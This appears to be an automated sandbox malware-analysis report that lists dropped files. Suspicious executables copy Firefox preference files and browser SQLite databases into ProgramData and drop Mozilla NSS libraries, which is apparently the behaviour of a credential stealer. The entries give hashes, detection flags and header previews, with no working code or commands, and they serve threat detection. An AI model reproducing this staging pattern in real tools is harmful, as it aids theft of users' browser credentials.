Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JJECAAEHCFIEBGCBGHIEGCFIII

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJJKEHCAKFBFHJKEHCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\1DTJW4

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JWBIEKNGVAAI\5PZCTR

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2652372268656278
Encrypted:	false
SSDEEP:	384:TY2qOB1nxCkMYSAELyKOMq+8yC8F/YfU5m+OlTLVumFk:5q+n0JY9ELyKOMq+8y9/Owqk
MD5:	E39AD45ECABFA1C776C7A1746BF5D852
SHA1:	86B440BA74A2E445F0D617EE62FE034980690776
SHA-256:	6CB8ABB19068EC1B856BDA872602C167961A8D528EE49FCBF1AAA378C3EC9ED6
SHA-512:	9A83D2A29ABA39A041E50FF9A56630A0419C7D085D34E8FC5F7371DA285002051E83C7F12E746CD35FD84549BA7517611B0C814DD0AD8AFA68E39E9214AB887A
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\HLNYCB

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\N7GVKF

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08438200565341271
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
MD5:	F7EEE7B0D281E250D1D8E36486F5A2C3
SHA1:	309736A27E794672BD1BDFBAC69B2C6734FC25CE
SHA-256:	378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
SHA-512:	CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\O8GVA1

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\PHLXTJ5XB

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\T2DT0R

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\VKNG4E3OZ

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JWBIEKNGVAAI\ZCJ5X4

Download File

Process:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: glpEv3POe7.exe, Detection: malicious, Browse Filename: gYjK72gL17.exe, Detection: malicious, Browse Filename: iUKUR1nUyD.exe, Detection: malicious, Browse Filename: cMTqzvmx9u.exe, Detection: malicious, Browse Filename: ElmEHL9kP9.exe, Detection: malicious, Browse Filename: xlSzrIs5h6.exe, Detection: malicious, Browse Filename: 1lhZVZx5nD.exe, Detection: malicious, Browse Filename: Qsqi9KQXgy.exe, Detection: malicious, Browse Filename: uLkHEqZ3u3.exe, Detection: malicious, Browse Filename: FnTSHWLNWB.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\46db7abb87da474d30237f9cb592c12b\msgid.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\09583692-394f-42e7-9e52-ec29edeacbcd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44615
Entropy (8bit):	6.096724560997279
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os18eaYSlE0lCcGoup1Xl3jVzXr4z:z/Ps+wsI7ynEZ6Mpchu3VlXr4CRo1
MD5:	D6CFE8E14C6CD44D053DE545A8605B6F
SHA1:	7C4B7AE2E1B980C521EB04424FB9D94E8573C9B7
SHA-256:	4EF4148E2847608E388519CA0C48205A9C4635993E514E404FA32A79AB3E8D74
SHA-512:	5009D8C4C6FD38322C54A14512425EE1FAEF72584727C68F45881F8AF5FFBF7F2BE9E27E15565DD178C1FA2437852847DE717793115B5884B6AEE6BDAD694582
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\162f11de-a21f-423b-ab07-ff2320e06778.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44623
Entropy (8bit):	6.0963395825190885
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBRwuehDO6vP6Os1IwAvDOzv8+cGoup1Xl3jVzXr4z:z/Ps+wsI7ynEZ6M1chu3VlXr4CRo1
MD5:	7AE36465F7D507DA8E6FF0976DEA24DF
SHA1:	020527D3BDB3D8B319E8C97C17996FB0E62839E1
SHA-256:	F3ACA4F13AB05E57F7F3250CA009A8366313B6BE0DBF359CAA878329DFDA6EB7
SHA-512:	B0328573A487F0FD11F7C026CEB2BD61BCA1F14357A931631B6D12BD2E906273EE867254577068B26BC7073F53B46119EF59EFE5019C65755D5EB89428D4EAC6
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\39c95b83-b2a6-4232-9bd3-cfef72475df1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44615
Entropy (8bit):	6.096724560997279
Encrypted:	false
